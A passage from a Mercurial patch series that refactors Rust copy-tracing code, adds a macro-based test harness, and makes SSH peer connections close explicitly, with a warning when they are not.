nb_items_raw: [u8; 4] = (&data[0..=3]) - .try_into() - .expect("failed to turn 4 bytes into 4 bytes"); - let nb_items = u32::from_be_bytes(nb_items_raw); + /// Only the end position is stored. The start is at the end of the + /// previous entry. + destination_path_end_position: unaligned::U32Be, - let index_size = (nb_items * Self::ENTRY_SIZE) as usize; - let index_end = Self::INDEX_START + index_size; + source_index_entry_position: unaligned::U32Be, +} + +fn _static_assert_size_of() { + let _ = std::mem::transmute::<ChangedFilesIndexEntry, [u8; 9]>; +} - assert!( - data.len() >= index_end, - "data size ({}) is too small to fit the index_data ({})", - data.len(), - index_end - ); +/// Represents the files affected by a changeset. +/// +/// This holds a subset of `mercurial.metadata.ChangingFiles` as we do not need +/// all the data categories tracked by it. +pub struct ChangedFiles<'a> { + index: &'a [ChangedFilesIndexEntry], + paths: &'a [u8], +} - let ret = ChangedFiles { - nb_items, - index: &data[Self::INDEX_START..index_end], - data: &data[index_end..], - }; - let max_data = ret.filename_end(nb_items - 1) as usize; - assert!( - ret.data.len() >= max_data, - "data size ({}) is too small to fit all data ({})", - data.len(), - index_end + max_data - ); - ret +impl<'a> ChangedFiles<'a> { + pub fn new(data: &'a [u8]) -> Self { + let (header, rest) = unaligned::U32Be::from_bytes(data).unwrap(); + let nb_index_entries = header.get() as usize; + let (index, paths) = + ChangedFilesIndexEntry::slice_from_bytes(rest, nb_index_entries) + .unwrap(); + Self { index, paths } } pub fn new_empty() -> Self { ChangedFiles { - nb_items: 0, - index: EMPTY, - data: EMPTY, + index: &[], + paths: &[], } } - /// internal function to return an individual entry at a given index - fn entry(&'a self, idx: u32) -> FileChange<'a> { - if idx >= self.nb_items { - panic!( - "index for entry is higher that the number of file {} >= {}", - idx, self.nb_items - ) - } - let flags = self.flags(idx); - let filename = self.filename(idx); - let copy_idx = self.copy_idx(idx); - let copy_source = self.filename(copy_idx); - (flags, filename, copy_source) - } - - /// internal function to return the filename of the entry at a given index - fn filename(&self, idx: u32) -> &HgPath { - let filename_start; - if idx == 0 { - filename_start = 0; + /// Internal function to return the filename of the entry at a given index + fn path(&self, idx: usize) -> &HgPath { + let start = if idx == 0 { + 0 } else { - filename_start = self.filename_end(idx - 1) - } - let filename_end = self.filename_end(idx); - let filename_start = filename_start as usize; - let filename_end = filename_end as usize; - HgPath::new(&self.data[filename_start..filename_end]) - } - - /// internal function to return the flag field of the entry at a given - /// index - fn flags(&self, idx: u32) -> u8 { - let idx = idx as usize; - self.index[idx * (Self::ENTRY_SIZE as usize)] - } - - /// internal function to return the end of a filename part at a given index - fn filename_end(&self, idx: u32) -> u32 { - let start = (idx * Self::ENTRY_SIZE) + Self::FILENAME_START; - let end = (idx * Self::ENTRY_SIZE) + Self::COPY_SOURCE_START; - let start = start as usize; - let end = end as usize; - let raw = (&self.index[start..end]) - .try_into() - .expect("failed to turn 4 bytes into 4 bytes"); - u32::from_be_bytes(raw) - } - - /// internal function to return index of the copy source of the entry at a - /// given index - fn copy_idx(&self, idx: u32) -> u32 { - let start = (idx * Self::ENTRY_SIZE) + Self::COPY_SOURCE_START; - let end = (idx + 1) * Self::ENTRY_SIZE; - let start = start as usize; - let end = end as usize; - let raw = (&self.index[start..end]) - .try_into() - .expect("failed to turn 4 bytes into 4 bytes"); - u32::from_be_bytes(raw) + self.index[idx - 1].destination_path_end_position.get() as usize + }; + let end = self.index[idx].destination_path_end_position.get() as usize; + HgPath::new(&self.paths[start..end]) } /// Return an iterator over all the `Action` in this instance. - fn iter_actions(&self) -> ActionsIterator { - ActionsIterator { - changes: &self, - current: 0, - } + fn iter_actions(&self) -> impl Iterator<Item = Action> { + self.index.iter().enumerate().flat_map(move |(idx, entry)| { + let path = self.path(idx); + if (entry.flags & ACTION_MASK) == REMOVED { + Some(Action::Removed(path)) + } else if (entry.flags & COPY_MASK) == P1_COPY { + let source_idx = + entry.source_index_entry_position.get() as usize; + Some(Action::CopiedFromP1(path, self.path(source_idx))) + } else if (entry.flags & COPY_MASK) == P2_COPY { + let source_idx = + entry.source_index_entry_position.get() as usize; + Some(Action::CopiedFromP2(path, self.path(source_idx))) + } else { + None + } + }) } /// return the MergeCase value associated with a filename fn get_merge_case(&self, path: &HgPath) -> MergeCase { - if self.nb_items == 0 { + if self.index.is_empty() { return MergeCase::Normal; } let mut low_part = 0; - let mut high_part = self.nb_items; + let mut high_part = self.index.len(); while low_part < high_part { let cursor = (low_part + high_part - 1) / 2; - let (flags, filename, _source) = self.entry(cursor); - match path.cmp(filename) { + match path.cmp(self.path(cursor)) { Ordering::Less => low_part = cursor + 1, Ordering::Greater => high_part = cursor, Ordering::Equal => { - return match flags & ACTION_MASK { + return match self.index[cursor].flags & ACTION_MASK { MERGED => MergeCase::Merged, SALVAGED => MergeCase::Salvaged, _ => MergeCase::Normal, @@ -305,32 +243,6 @@ } } -struct ActionsIterator<'a> { - changes: &'a ChangedFiles<'a>, - current: u32, -} - -impl<'a> Iterator for ActionsIterator<'a> { - type Item = Action<'a>; - - fn next(&mut self) -> Option<Action<'a>> { - while self.current < self.changes.nb_items { - let (flags, file, source) = self.changes.entry(self.current); - self.current += 1; - if (flags & ACTION_MASK) == REMOVED { - return Some(Action::Removed(file)); - } - let copy = flags & COPY_MASK; - if copy == P1_COPY { - return Some(Action::CopiedFromP1(file, source)); - } else if copy == P2_COPY { - return Some(Action::CopiedFromP2(file, source)); - } - } - return None; - } -} - /// A small "tokenizer" responsible of turning full HgPath into lighter /// PathToken /// # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1610368380 -3600 # Mon Jan 11 13:33:00 2021 +0100 # Node ID fa21633af20198d9006ced9a0eae063af08df165 # Parent f977a065c7c2bed8b74375312791b79de26a7cb2 copies-rust: add a macro-based unit-testing framework `compare_values`, `merge_copies_dict`, and `CombineChangesetCopies` are APIs whose signatures involve non-trivial types. Calling them directly in unit tests would involve a lot of verbose setup code that obscures the meaningful parts of a given test case. This adds a macro-based test-harness with pseudo-syntax to tersely create arguments and expected return values in the correct types. For now there is only one (not particularly meaningful) test case per tested function, just to exercize the macros. Differential Revision: https://phab.mercurial-scm.org/D10071 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -1,3 +1,10 @@ +#[cfg(test)] +#[macro_use] +mod tests_support; + +#[cfg(test)] +mod tests; + use crate::utils::hg_path::HgPath; use crate::utils::hg_path::HgPathBuf; use crate::Revision; diff --git a/rust/hg-core/src/copy_tracing/tests.rs b/rust/hg-core/src/copy_tracing/tests.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/copy_tracing/tests.rs @@ -0,0 +1,141 @@ +use super::*; + +/// Unit tests for: +/// +/// ```ignore +/// fn compare_value( +/// current_merge: Revision, +/// merge_case_for_dest: impl Fn() -> MergeCase, +/// src_minor: &CopySource, +/// src_major: &CopySource, +/// ) -> (MergePick, /* overwrite: */ bool) +/// ``` +#[test] +fn test_compare_value() { + // The `compare_value!` macro calls the `compare_value` function with + // arguments given in pseudo-syntax: + // + // * For `merge_case_for_dest` it takes a plain `MergeCase` value instead + // of a closure. + // * `CopySource` values are represented as `(rev, path, overwritten)` + // tuples of type `(Revision, Option<PathToken>, OrdSet<Revision>)`. + // * `PathToken` is an integer not read by `compare_value`. It only checks + // for `Some(_)` indicating a file copy v.s. `None` for a file deletion. + // * `OrdSet<Revision>` is represented as a Python-like set literal. + + use MergeCase::*; + use MergePick::*; + + assert_eq!( + compare_value!(1, Normal, (1, None, { 1 }), (1, None, { 1 })), + (Any, false) + ); +} + +/// Unit tests for: +/// +/// ```ignore +/// fn merge_copies_dict( +/// path_map: &TwoWayPathMap, // Not visible in test cases +/// current_merge: Revision, +/// minor: InternalPathCopies, +/// major: InternalPathCopies, +/// get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy, +/// ) -> InternalPathCopies +/// ``` +#[test] +fn test_merge_copies_dict() { + // The `merge_copies_dict!` macro calls the `merge_copies_dict` function + // with arguments given in pseudo-syntax: + // + // * `TwoWayPathMap` and path tokenization are implicitly taken care of. + // All paths are given as string literals. + // * Key-value maps are represented with `{key1 => value1, key2 => value2}` + // pseudo-syntax. + // * `InternalPathCopies` is a map of copy destination path keys to + // `CopySource` values. + // - `CopySource` is represented as a `(rev, source_path, overwritten)` + // tuple of type `(Revision, Option<Path>, OrdSet<Revision>)`. + // - Unlike in `test_compare_value`, source paths are string literals. + // - `OrdSet<Revision>` is again represented as a Python-like set + // literal. + // * `get_merge_case` is represented as a map of copy destination path to + // `MergeCase`. The default for paths not in the map is + // `MergeCase::Normal`. + // + // `internal_path_copies!` creates an `InternalPathCopies` value with the + // same pseudo-syntax as in `merge_copies_dict!`. + + use MergeCase::*; + + assert_eq!( + merge_copies_dict!( + 1, + {"foo" => (1, None, {})}, + {}, + {"foo" => Merged} + ), + internal_path_copies!("foo" => (1, None, {})) + ); +} + +/// Unit tests for: +/// +/// ```ignore +/// impl CombineChangesetCopies { +/// fn new(children_count: HashMap<Revision, usize>) -> Self +/// +/// // Called repeatedly: +/// fn add_revision_inner<'a>( +/// &mut self, +/// rev: Revision, +/// p1: Revision, +/// p2: Revision, +/// copy_actions: impl Iterator<Item = Action<'a>>, +/// get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy, +/// ) +/// +/// fn finish(mut self, target_rev: Revision) -> PathCopies +/// } +/// ``` +#[test] +fn test_combine_changeset_copies() { + // `combine_changeset_copies!` creates a `CombineChangesetCopies` with + // `new`, then calls `add_revision_inner` repeatedly, then calls `finish` + // for its return value. + // + // All paths given as string literals. + // + // * Key-value maps are represented with `{key1 => value1, key2 => value2}` + // pseudo-syntax. + // * `children_count` is a map of revision numbers to count of children in + // the DAG. It includes all revisions that should be considered by the + // algorithm. + // * Calls to `add_revision_inner` are represented as an array of anonymous + // structs with named fields, one pseudo-struct per call. + // + // `path_copies!` creates a `PathCopies` value, a map of copy destination + // keys to copy source values. Note: the arrows for map literal syntax + // point **backwards** compared to the logical direction of copy! + + use crate::NULL_REVISION as NULL; + use Action::*; + use MergeCase::*; + + assert_eq!( + combine_changeset_copies!( + { 1 => 1, 2 => 1 }, + [ + { rev: 1, p1: NULL, p2: NULL, actions: [], merge_cases: {}, }, + { rev: 2, p1: NULL, p2: NULL, actions: [], merge_cases: {}, }, + { + rev: 3, p1: 1, p2: 2, + actions: [CopiedFromP1("destination.txt", "source.txt")], + merge_cases: {"destination.txt" => Merged}, + }, + ], + 3, + ), + path_copies!("destination.txt" => "source.txt") + ); +} diff --git a/rust/hg-core/src/copy_tracing/tests_support.rs b/rust/hg-core/src/copy_tracing/tests_support.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/copy_tracing/tests_support.rs @@ -0,0 +1,199 @@ +//! Supporting macros for `tests.rs` in the same directory. +//! See comments there for usage. + +/// Python-like set literal +macro_rules! set { + ( + $Type: ty { + $( $value: expr ),* $(,)? + } + ) => {{ + #[allow(unused_mut)] + let mut set = <$Type>::new(); + $( set.insert($value); )* + set + }} +} + +/// `{key => value}` map literal +macro_rules! map { + ( + $Type: ty { + $( $key: expr => $value: expr ),* $(,)? + } + ) => {{ + #[allow(unused_mut)] + let mut set = <$Type>::new(); + $( set.insert($key, $value); )* + set + }} +} + +macro_rules! copy_source { + ($rev: expr, $path: expr, $overwritten: tt) => { + CopySource { + rev: $rev, + path: $path, + overwritten: set!(OrdSet<Revision> $overwritten), + } + }; +} + +macro_rules! compare_value { + ( + $merge_revision: expr, + $merge_case_for_dest: ident, + ($min_rev: expr, $min_path: expr, $min_overwrite: tt), + ($maj_rev: expr, $maj_path: expr, $maj_overwrite: tt) $(,)? + ) => { + compare_value( + $merge_revision, + || $merge_case_for_dest, + ©_source!($min_rev, $min_path, $min_overwrite), + ©_source!($maj_rev, $maj_path, $maj_overwrite), + ) + }; +} + +macro_rules! tokenized_path_copies { + ( + $path_map: ident, {$( + $dest: expr => ( + $src_rev: expr, + $src_path: expr, + $src_overwrite: tt + ) + ),*} + $(,)* + ) => { + map!(InternalPathCopies {$( + $path_map.tokenize(HgPath::new($dest)) => + copy_source!( + $src_rev, + Option::map($src_path, |p: &str| { + $path_map.tokenize(HgPath::new(p)) + }), + $src_overwrite + ) + )*}) + } +} + +macro_rules! merge_case_callback { + ( + $( $merge_path: expr => $merge_case: ident ),* + $(,)? + ) => { + #[allow(unused)] + |merge_path| -> MergeCase { + $( + if (merge_path == HgPath::new($merge_path)) { + return $merge_case + } + )* + MergeCase::Normal + } + }; +} + +macro_rules! merge_copies_dict { + ( + $current_merge: expr, + $minor_copies: tt, + $major_copies: tt, + $get_merge_case: tt $(,)? + ) => { + { + #[allow(unused_mut)] + let mut map = TwoWayPathMap::default(); + let minor = tokenized_path_copies!(map, $minor_copies); + let major = tokenized_path_copies!(map, $major_copies); + merge_copies_dict( + &map, $current_merge, minor, major, + merge_case_callback! $get_merge_case, + ) + .into_iter() + .map(|(token, source)| { + ( + map.untokenize(token).to_string(), + ( + source.rev, + source.path.map(|t| map.untokenize(t).to_string()), + source.overwritten.into_iter().collect(), + ), + ) + }) + .collect::<OrdMap<_, _>>() + } + }; +} + +macro_rules! internal_path_copies { + ( + $( + $dest: expr => ( + $src_rev: expr, + $src_path: expr, + $src_overwrite: tt $(,)? + ) + ),* + $(,)* + ) => { + map!(OrdMap<_, _> {$( + String::from($dest) => ( + $src_rev, + $src_path, + set!(OrdSet<Revision> $src_overwrite) + ) + ),*}) + }; +} + +macro_rules! combine_changeset_copies { + ( + $children_count: tt, + [ + $( + { + rev: $rev: expr, + p1: $p1: expr, + p2: $p2: expr, + actions: [ + $( + $Action: ident($( $action_path: expr ),+) + ),* + $(,)? + ], + merge_cases: $merge: tt + $(,)? + } + ),* + $(,)? + ], + $target_rev: expr $(,)* + ) => {{ + let count = map!(HashMap<Revision, usize> $children_count); + let mut combine_changeset_copies = CombineChangesetCopies::new(count); + $( + let actions = vec![$( + $Action($( HgPath::new($action_path) ),*) + ),*]; + combine_changeset_copies.add_revision_inner( + $rev, $p1, $p2, actions.into_iter(), + merge_case_callback! $merge + ); + )* + combine_changeset_copies.finish($target_rev) + }}; +} + +macro_rules! path_copies { + ( + $( $expected_destination: expr => $expected_source: expr ),* $(,)? + ) => { + map!(PathCopies {$( + HgPath::new($expected_destination).to_owned() + => HgPath::new($expected_source).to_owned(), + ),*}) + }; +} # HG changeset patch # User Valentin Gatien-Baron <valentin.gatienbaron@gmail.com> # Date 1613415576 18000 # Mon Feb 15 13:59:36 2021 -0500 # Node ID 8c4906105f37033dbd57340363ce09fef05572ed # Parent fa21633af20198d9006ced9a0eae063af08df165 sshpeer: make sshpeer.close() close the underlying connection So the connection can be closed eagerly in future commits, instead of relying on __del__. Differential Revision: https://phab.mercurial-scm.org/D9995 diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -434,7 +434,7 @@ return True def close(self): - pass + self._cleanup() # End of ipeerconnection interface. # HG changeset patch # User Valentin Gatien-Baron <valentin.gatienbaron@gmail.com> # Date 1613416298 18000 # Mon Feb 15 14:11:38 2021 -0500 # Node ID 0738bc25d6acce9d92be34118f60f80955b9007b # Parent 8c4906105f37033dbd57340363ce09fef05572ed sshpeer: add a method to check if a doublepipe is closed So we can tell in a next commit if we're trying to close an already closed connection or not (in which case, we may warn). Differential Revision: https://phab.mercurial-scm.org/D9996 diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -140,6 +140,10 @@ def close(self): return self._main.close() + @property + def closed(self): + return self._main.closed + def flush(self): return self._main.flush() diff --git a/tests/test-check-interfaces.py b/tests/test-check-interfaces.py --- a/tests/test-check-interfaces.py +++ b/tests/test-check-interfaces.py @@ -113,6 +113,10 @@ def close(self): pass + @property + def closed(self): + pass + def main(): ui = uimod.ui() # HG changeset patch # User Valentin Gatien-Baron <valentin.gatienbaron@gmail.com> # Date 1613416502 18000 # Mon Feb 15 14:15:02 2021 -0500 # Node ID 0509cee38757ea336a9cdfa41a3d06962c46a238 # Parent 0738bc25d6acce9d92be34118f60f80955b9007b remotefilelog: rework workaround for sshpeer deadlocks The wrapping of `sshpeer.cleanup` silently broke when `cleanup` was renamed to `_cleanup`, a couple of years ago. I don't know what `orig.im_self` is, but regardless, the intention of the wrapping seems pretty clear: close stderr before sshpeer._cleanuppipes blocks on it. So do that. Differential Revision: https://phab.mercurial-scm.org/D9997 diff --git a/hgext/remotefilelog/connectionpool.py b/hgext/remotefilelog/connectionpool.py --- a/hgext/remotefilelog/connectionpool.py +++ b/hgext/remotefilelog/connectionpool.py @@ -43,17 +43,19 @@ if conn is None: - def _cleanup(orig): - # close pipee first so peer.cleanup reading it won't deadlock, - # if there are other processes with pipeo open (i.e. us). - peer = orig.im_self - if util.safehasattr(peer, 'pipee'): - peer.pipee.close() - return orig() + peer = hg.peer(self._repo.ui, {}, path) + if util.safehasattr(peer, '_cleanup'): - peer = hg.peer(self._repo.ui, {}, path) - if util.safehasattr(peer, 'cleanup'): - extensions.wrapfunction(peer, b'cleanup', _cleanup) + class mypeer(peer.__class__): + def _cleanup(self): + # close pipee first so peer.cleanup reading it won't + # deadlock, if there are other processes with pipeo + # open (i.e. us). + if util.safehasattr(self, 'pipee'): + self.pipee.close() + return super(mypeer, self)._cleanup() + + peer.__class__ = mypeer conn = connection(pathpool, peer) # HG changeset patch # User Valentin Gatien-Baron <valentin.gatienbaron@gmail.com> # Date 1613418017 18000 # Mon Feb 15 14:40:17 2021 -0500 # Node ID db8037e38085910cc73ecaec73e8090555acd346 # Parent 0509cee38757ea336a9cdfa41a3d06962c46a238 sshpeer: add a develwarning if an sshpeer is not closed explicitly The warning is disabled until the next commit, because fixing it results in a noisy diff due to indentation changes. Differential Revision: https://phab.mercurial-scm.org/D9998 diff --git a/hgext/remotefilelog/connectionpool.py b/hgext/remotefilelog/connectionpool.py --- a/hgext/remotefilelog/connectionpool.py +++ b/hgext/remotefilelog/connectionpool.py @@ -47,7 +47,7 @@ if util.safehasattr(peer, '_cleanup'): class mypeer(peer.__class__): - def _cleanup(self): + def _cleanup(self, warn=None): # close pipee first so peer.cleanup reading it won't # deadlock, if there are other processes with pipeo # open (i.e. us). diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -148,14 +148,18 @@ return self._main.flush() -def _cleanuppipes(ui, pipei, pipeo, pipee): +def _cleanuppipes(ui, pipei, pipeo, pipee, warn): """Clean up pipes used by an SSH connection.""" - if pipeo: + didsomething = False + if pipeo and not pipeo.closed: + didsomething = True pipeo.close() - if pipei: + if pipei and not pipei.closed: + didsomething = True pipei.close() - if pipee: + if pipee and not pipee.closed: + didsomething = True # Try to read from the err descriptor until EOF. try: for l in pipee: @@ -165,6 +169,17 @@ pipee.close() + if didsomething and warn is not None: + # Encourage explicit close of sshpeers. Closing via __del__ is + # not very predictable when exceptions are thrown, which has led + # to deadlocks due to a peer get gc'ed in a fork + # We add our own stack trace, because the stacktrace when called + # from __del__ is useless. + if False: # enabled in next commit + ui.develwarn( + b'missing close on SSH connection created at:\n%s' % warn + ) + def _makeconnection(ui, sshcmd, args, remotecmd, path, sshenv=None): """Create an SSH connection to a server. @@ -416,6 +431,7 @@ self._pipee = stderr self._caps = caps self._autoreadstderr = autoreadstderr + self._initstack = b''.join(util.getstackframes(1)) # Commands that have a "framed" response where the first line of the # response contains the length of that response. @@ -456,10 +472,11 @@ self._cleanup() raise exception - def _cleanup(self): - _cleanuppipes(self.ui, self._pipei, self._pipeo, self._pipee) + def _cleanup(self, warn=None): + _cleanuppipes(self.ui, self._pipei, self._pipeo, self._pipee, warn=warn) - __del__ = _cleanup + def __del__(self): + self._cleanup(warn=self._initstack) def _sendrequest(self, cmd, args, framed=False): if self.ui.debugflag and self.ui.configbool( @@ -611,7 +628,7 @@ try: protoname, caps = _performhandshake(ui, stdin, stdout, stderr) except Exception: - _cleanuppipes(ui, stdout, stdin, stderr) + _cleanuppipes(ui, stdout, stdin, stderr, warn=None) raise if protoname == wireprototypes.SSHV1: @@ -637,7 +654,7 @@ autoreadstderr=autoreadstderr, ) else: - _cleanuppipes(ui, stdout, stdin, stderr) + _cleanuppipes(ui, stdout, stdin, stderr, warn=None) raise error.RepoError( _(b'unknown version of SSH protocol: %s') % protoname ) # HG changeset patch # User Valentin Gatien-Baron <valentin.gatienbaron@gmail.com> # Date 1613418516 18000 # Mon Feb 15 14:48:36 2021 -0500 # Node ID a4c19a162615afd0dc8ab571be25d3134da7b15d # Parent db8037e38085910cc73ecaec73e8090555acd346 sshpeer: enable+fix warning about sshpeers not being closed explicitly I recommend looking at this with a diff that ignores indentation. The test changes are because localrepo.close() updates some cache, which appears happens earlier now on rollbacks or strips or something. The http changes are because httppeer.close() prints stats with --verbose. Differential Revision: https://phab.mercurial-scm.org/D9999 diff --git a/hgext/infinitepush/__init__.py b/hgext/infinitepush/__init__.py --- a/hgext/infinitepush/__init__.py +++ b/hgext/infinitepush/__init__.py @@ -704,16 +704,19 @@ if scratchbookmarks: other = hg.peer(repo, opts, source) - fetchedbookmarks = other.listkeyspatterns( - b'bookmarks', patterns=scratchbookmarks - ) - for bookmark in scratchbookmarks: - if bookmark not in fetchedbookmarks: - raise error.Abort( - b'remote bookmark %s not found!' % bookmark - ) - scratchbookmarks[bookmark] = fetchedbookmarks[bookmark] - revs.append(fetchedbookmarks[bookmark]) + try: + fetchedbookmarks = other.listkeyspatterns( + b'bookmarks', patterns=scratchbookmarks + ) + for bookmark in scratchbookmarks: + if bookmark not in fetchedbookmarks: + raise error.Abort( + b'remote bookmark %s not found!' % bookmark + ) + scratchbookmarks[bookmark] = fetchedbookmarks[bookmark] + revs.append(fetchedbookmarks[bookmark]) + finally: + other.close() opts[b'bookmark'] = bookmarks opts[b'rev'] = revs @@ -848,10 +851,13 @@ if common.isremotebooksenabled(ui): if bookmark and scratchpush: other = hg.peer(repo, opts, destpath) - fetchedbookmarks = other.listkeyspatterns( - b'bookmarks', patterns=[bookmark] - ) - remotescratchbookmarks.update(fetchedbookmarks) + try: + fetchedbookmarks = other.listkeyspatterns( + b'bookmarks', patterns=[bookmark] + ) + remotescratchbookmarks.update(fetchedbookmarks) + finally: + other.close() _saveremotebookmarks(repo, remotescratchbookmarks, destpath) if oldphasemove: exchange._localphasemove = oldphasemove diff --git a/hgext/narrow/narrowcommands.py b/hgext/narrow/narrowcommands.py --- a/hgext/narrow/narrowcommands.py +++ b/hgext/narrow/narrowcommands.py @@ -595,77 +595,83 @@ ui.status(_(b'comparing with %s\n') % util.hidepassword(url)) remote = hg.peer(repo, opts, url) - # check narrow support before doing anything if widening needs to be - # performed. In future we should also abort if client is ellipses and - # server does not support ellipses - if widening and wireprototypes.NARROWCAP not in remote.capabilities(): - raise error.Abort(_(b"server does not support narrow clones")) + try: + # check narrow support before doing anything if widening needs to be + # performed. In future we should also abort if client is ellipses and + # server does not support ellipses + if ( + widening + and wireprototypes.NARROWCAP not in remote.capabilities() + ): + raise error.Abort(_(b"server does not support narrow clones")) - commoninc = discovery.findcommonincoming(repo, remote) + commoninc = discovery.findcommonincoming(repo, remote) - if autoremoveincludes: - outgoing = discovery.findcommonoutgoing( - repo, remote, commoninc=commoninc - ) - ui.status(_(b'looking for unused includes to remove\n')) - localfiles = set() - for n in itertools.chain(outgoing.missing, outgoing.excluded): - localfiles.update(repo[n].files()) - suggestedremovals = [] - for include in sorted(oldincludes): - match = narrowspec.match(repo.root, [include], oldexcludes) - if not any(match(f) for f in localfiles): - suggestedremovals.append(include) - if suggestedremovals: - for s in suggestedremovals: - ui.status(b'%s\n' % s) - if ( - ui.promptchoice( - _( - b'remove these unused includes (yn)?' - b'$$ &Yes $$ &No' + if autoremoveincludes: + outgoing = discovery.findcommonoutgoing( + repo, remote, commoninc=commoninc + ) + ui.status(_(b'looking for unused includes to remove\n')) + localfiles = set() + for n in itertools.chain(outgoing.missing, outgoing.excluded): + localfiles.update(repo[n].files()) + suggestedremovals = [] + for include in sorted(oldincludes): + match = narrowspec.match(repo.root, [include], oldexcludes) + if not any(match(f) for f in localfiles): + suggestedremovals.append(include) + if suggestedremovals: + for s in suggestedremovals: + ui.status(b'%s\n' % s) + if ( + ui.promptchoice( + _( + b'remove these unused includes (yn)?' + b'$$ &Yes $$ &No' + ) ) - ) - == 0 - ): - removedincludes.update(suggestedremovals) - narrowing = True - else: - ui.status(_(b'found no unused includes\n')) + == 0 + ): + removedincludes.update(suggestedremovals) + narrowing = True + else: + ui.status(_(b'found no unused includes\n')) - if narrowing: - newincludes = oldincludes - removedincludes - newexcludes = oldexcludes | addedexcludes - _narrow( - ui, - repo, - remote, - commoninc, - oldincludes, - oldexcludes, - newincludes, - newexcludes, - opts[b'force_delete_local_changes'], - opts[b'backup'], - ) - # _narrow() updated the narrowspec and _widen() below needs to - # use the updated values as its base (otherwise removed includes - # and addedexcludes will be lost in the resulting narrowspec) - oldincludes = newincludes - oldexcludes = newexcludes + if narrowing: + newincludes = oldincludes - removedincludes + newexcludes = oldexcludes | addedexcludes + _narrow( + ui, + repo, + remote, + commoninc, + oldincludes, + oldexcludes, + newincludes, + newexcludes, + opts[b'force_delete_local_changes'], + opts[b'backup'], + ) + # _narrow() updated the narrowspec and _widen() below needs to + # use the updated values as its base (otherwise removed includes + # and addedexcludes will be lost in the resulting narrowspec) + oldincludes = newincludes + oldexcludes = newexcludes - if widening: - newincludes = oldincludes | addedincludes - newexcludes = oldexcludes - removedexcludes - _widen( - ui, - repo, - remote, - commoninc, - oldincludes, - oldexcludes, - newincludes, - newexcludes, - ) + if widening: + newincludes = oldincludes | addedincludes + newexcludes = oldexcludes - removedexcludes + _widen( + ui, + repo, + remote, + commoninc, + oldincludes, + oldexcludes, + newincludes, + newexcludes, + ) + finally: + remote.close() return 0 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -3820,132 +3820,138 @@ output = [] revs = [] - if source: - source, branches = hg.parseurl(ui.expandpath(source)) - peer = hg.peer(repo or ui, opts, source) # only pass ui when no repo - repo = peer.local() - revs, checkout = hg.addbranchrevs(repo, peer, branches, None) - - fm = ui.formatter(b'identify', opts) - fm.startitem() - - if not repo: - if num or branch or tags: - raise error.InputError( - _(b"can't query remote revision number, branch, or tags") - ) - if not rev and revs: - rev = revs[0] - if not rev: - rev = b"tip" - - remoterev = peer.lookup(rev) - hexrev = fm.hexfunc(remoterev) - if default or id: - output = [hexrev] - fm.data(id=hexrev) - - @util.cachefunc - def getbms(): - bms = [] - - if b'bookmarks' in peer.listkeys(b'namespaces'): - hexremoterev = hex(remoterev) - bms = [ - bm - for bm, bmr in pycompat.iteritems( - peer.listkeys(b'bookmarks') + peer = None + try: + if source: + source, branches = hg.parseurl(ui.expandpath(source)) + # only pass ui when no repo + peer = hg.peer(repo or ui, opts, source) + repo = peer.local() + revs, checkout = hg.addbranchrevs(repo, peer, branches, None) + + fm = ui.formatter(b'identify', opts) + fm.startitem() + + if not repo: + if num or branch or tags: + raise error.InputError( + _(b"can't query remote revision number, branch, or tags") + ) + if not rev and revs: + rev = revs[0] + if not rev: + rev = b"tip" + + remoterev = peer.lookup(rev) + hexrev = fm.hexfunc(remoterev) + if default or id: + output = [hexrev] + fm.data(id=hexrev) + + @util.cachefunc + def getbms(): + bms = [] + + if b'bookmarks' in peer.listkeys(b'namespaces'): + hexremoterev = hex(remoterev) + bms = [ + bm + for bm, bmr in pycompat.iteritems( + peer.listkeys(b'bookmarks') + ) + if bmr == hexremoterev + ] + + return sorted(bms) + + if fm.isplain(): + if bookmarks: + output.extend(getbms()) + elif default and not ui.quiet: + # multiple bookmarks for a single parent separated by '/' + bm = b'/'.join(getbms()) + if bm: + output.append(bm) + else: + fm.data(node=hex(remoterev)) + if bookmarks or b'bookmarks' in fm.datahint(): + fm.data(bookmarks=fm.formatlist(getbms(), name=b'bookmark')) + else: + if rev: + repo = scmutil.unhidehashlikerevs(repo, [rev], b'nowarn') + ctx = scmutil.revsingle(repo, rev, None) + + if ctx.rev() is None: + ctx = repo[None] + parents = ctx.parents() + taglist = [] + for p in parents: + taglist.extend(p.tags()) + + dirty = b"" + if ctx.dirty(missing=True, merge=False, branch=False): + dirty = b'+' + fm.data(dirty=dirty) + + hexoutput = [fm.hexfunc(p.node()) for p in parents] + if default or id: + output = [b"%s%s" % (b'+'.join(hexoutput), dirty)] + fm.data(id=b"%s%s" % (b'+'.join(hexoutput), dirty)) + + if num: + numoutput = [b"%d" % p.rev() for p in parents] + output.append(b"%s%s" % (b'+'.join(numoutput), dirty)) + + fm.data( + parents=fm.formatlist( + [fm.hexfunc(p.node()) for p in parents], name=b'node' ) - if bmr == hexremoterev - ] - - return sorted(bms) - - if fm.isplain(): - if bookmarks: - output.extend(getbms()) - elif default and not ui.quiet: + ) + else: + hexoutput = fm.hexfunc(ctx.node()) + if default or id: + output = [hexoutput] + fm.data(id=hexoutput) + + if num: + output.append(pycompat.bytestr(ctx.rev())) + taglist = ctx.tags() + + if default and not ui.quiet: + b = ctx.branch() + if b != b'default': + output.append(b"(%s)" % b) + + # multiple tags for a single parent separated by '/' + t = b'/'.join(taglist) + if t: + output.append(t) + # multiple bookmarks for a single parent separated by '/' - bm = b'/'.join(getbms()) + bm = b'/'.join(ctx.bookmarks()) if bm: output.append(bm) - else: - fm.data(node=hex(remoterev)) - if bookmarks or b'bookmarks' in fm.datahint(): - fm.data(bookmarks=fm.formatlist(getbms(), name=b'bookmark')) - else: - if rev: - repo = 